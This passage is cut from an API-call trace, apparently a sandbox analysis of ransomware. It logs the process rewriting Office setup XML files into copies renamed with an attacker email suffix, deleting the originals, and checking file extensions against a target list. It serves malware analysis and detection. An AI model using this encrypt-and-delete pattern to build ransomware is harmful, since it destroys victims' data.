files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 0x20 [0040.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.574] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.574] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.575] GetLastError () returned 0x0 [0040.575] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x106f, lpOverlapped=0x0) returned 1 [0040.576] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1070, lpOverlapped=0x0) returned 1 [0040.577] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.577] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.577] SetEndOfFile (hFile=0x1c8) returned 1 [0040.578] CloseHandle (hObject=0x1c8) returned 1 [0040.578] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.578] SetEndOfFile (hFile=0x1b8) returned 1 [0040.579] CloseHandle (hObject=0x1b8) returned 1 [0040.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.580] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1 [0040.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.580] lstrlenW (lpString=".doc") returned 4 [0040.580] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.580] lstrlenW (lpString=".docx") returned 5 [0040.580] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.580] lstrlenW (lpString=".pdf") returned 4 [0040.580] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.580] lstrlenW (lpString=".xls") returned 4 [0040.580] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.580] lstrlenW (lpString=".xlsx") returned 5 [0040.580] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.580] lstrlenW (lpString=".ppt") returned 4 [0040.580] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.580] lstrlenW (lpString=".zip") returned 4 [0040.580] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.580] lstrlenW (lpString=".rar") returned 4 [0040.581] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString=".bz2") returned 4 [0040.581] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString=".7z") returned 3 [0040.581] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.581] lstrlenW (lpString=".dbf") returned 4 [0040.581] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.581] lstrlenW (lpString=".1cd") returned 4 [0040.581] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.581] lstrlenW (lpString=".jpg") returned 4 [0040.581] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.581] lstrlenW (lpString=".doc") returned 4 [0040.581] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString=".docx") returned 5 [0040.581] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.581] lstrlenW (lpString=".pdf") returned 4 [0040.581] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString=".xls") returned 4 [0040.581] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString=".xlsx") returned 5 [0040.581] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.581] lstrlenW (lpString=".ppt") returned 4 [0040.581] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.581] lstrlenW (lpString=".zip") returned 4 [0040.581] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.581] lstrlenW (lpString=".rar") returned 4 [0040.581] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.581] lstrlenW (lpString=".bz2") returned 4 [0040.582] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.582] lstrlenW (lpString=".7z") returned 3 [0040.582] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.582] lstrlenW (lpString=".dbf") returned 4 [0040.582] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.582] lstrlenW (lpString=".1cd") returned 4 [0040.582] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.582] lstrlenW (lpString=".jpg") returned 4 [0040.582] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.582] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.582] lstrlenW (lpString="PowerPointMUI.XML") returned 17 [0040.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.582] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1450) returned 1 [0040.582] CloseHandle (hObject=0x1b8) returned 1 [0040.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 0x20 [0040.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.583] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.583] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.324] GetLastError () returned 0x0 [0041.324] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x5aa, lpOverlapped=0x0) returned 1 [0041.326] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0041.326] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.326] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xf6, lpOverlapped=0x0) returned 1 [0041.327] SetEndOfFile (hFile=0x170) returned 1 [0041.327] CloseHandle (hObject=0x170) returned 1 [0041.328] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.328] SetEndOfFile (hFile=0x1b8) returned 1 [0041.328] CloseHandle (hObject=0x1b8) returned 1 [0041.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.329] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1 [0041.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.329] lstrlenW (lpString=".doc") returned 4 [0041.329] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.329] lstrlenW (lpString=".docx") returned 5 [0041.329] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.329] lstrlenW (lpString=".pdf") returned 4 [0041.329] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.329] lstrlenW (lpString=".xls") returned 4 [0041.329] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.329] lstrlenW (lpString=".xlsx") returned 5 [0041.329] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.329] lstrlenW (lpString=".ppt") returned 4 [0041.329] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.329] lstrlenW (lpString=".zip") returned 4 [0041.329] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.329] lstrlenW (lpString=".rar") returned 4 [0041.329] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString=".bz2") returned 4 [0041.330] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString=".7z") returned 3 [0041.330] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.330] lstrlenW (lpString=".dbf") returned 4 [0041.330] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.330] lstrlenW (lpString=".1cd") returned 4 [0041.330] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.330] lstrlenW (lpString=".jpg") returned 4 [0041.330] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.330] lstrlenW (lpString=".doc") returned 4 [0041.330] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString=".docx") returned 5 [0041.330] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.330] lstrlenW (lpString=".pdf") returned 4 [0041.330] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString=".xls") returned 4 [0041.330] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString=".xlsx") returned 5 [0041.330] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.330] lstrlenW (lpString=".ppt") returned 4 [0041.330] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.330] lstrlenW (lpString=".zip") returned 4 [0041.330] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.330] lstrlenW (lpString=".rar") returned 4 [0041.330] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.330] lstrlenW (lpString=".bz2") returned 4 [0041.330] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.331] lstrlenW (lpString=".7z") returned 3 [0041.331] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.331] lstrlenW (lpString=".dbf") returned 4 [0041.331] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.331] lstrlenW (lpString=".1cd") returned 4 [0041.331] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0041.331] lstrlenW (lpString=".jpg") returned 4 [0041.331] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.331] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.331] lstrlenW (lpString="PublisherMUI.XML") returned 16 [0041.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.331] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1450) returned 1 [0041.331] CloseHandle (hObject=0x1b8) returned 1 [0041.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 0x20 [0041.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.332] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.332] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0041.333] GetLastError () returned 0x0 [0041.333] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x5aa, lpOverlapped=0x0) returned 1 [0041.335] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0041.336] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.336] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xf4, lpOverlapped=0x0) returned 1 [0041.336] SetEndOfFile (hFile=0x1c8) returned 1 [0041.336] CloseHandle (hObject=0x1c8) returned 1 [0041.337] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.337] SetEndOfFile (hFile=0x1b8) returned 1 [0041.337] CloseHandle (hObject=0x1b8) returned 1 [0041.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.338] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1 [0041.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.338] lstrlenW (lpString=".doc") returned 4 [0041.338] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.338] lstrlenW (lpString=".docx") returned 5 [0041.338] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.338] lstrlenW (lpString=".pdf") returned 4 [0041.338] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.338] lstrlenW (lpString=".xls") returned 4 [0041.338] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.338] lstrlenW (lpString=".xlsx") returned 5 [0041.338] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.338] lstrlenW (lpString=".ppt") returned 4 [0041.338] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.338] lstrlenW (lpString=".zip") returned 4 [0041.338] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.338] lstrlenW (lpString=".rar") returned 4 [0041.338] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.338] lstrlenW (lpString=".bz2") returned 4 [0041.338] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.338] lstrlenW (lpString=".7z") returned 3 [0041.338] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.338] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.338] lstrlenW (lpString=".dbf") returned 4 [0041.339] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.339] lstrlenW (lpString=".1cd") returned 4 [0041.339] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.339] lstrlenW (lpString=".jpg") returned 4 [0041.339] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.339] lstrlenW (lpString=".doc") returned 4 [0041.339] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString=".docx") returned 5 [0041.339] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.339] lstrlenW (lpString=".pdf") returned 4 [0041.339] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString=".xls") returned 4 [0041.339] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString=".xlsx") returned 5 [0041.339] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.339] lstrlenW (lpString=".ppt") returned 4 [0041.339] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.339] lstrlenW (lpString=".zip") returned 4 [0041.339] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.339] lstrlenW (lpString=".rar") returned 4 [0041.339] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString=".bz2") returned 4 [0041.339] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.339] lstrlenW (lpString=".7z") returned 3 [0041.340] lstrcmpiW (lpString1=".7z", 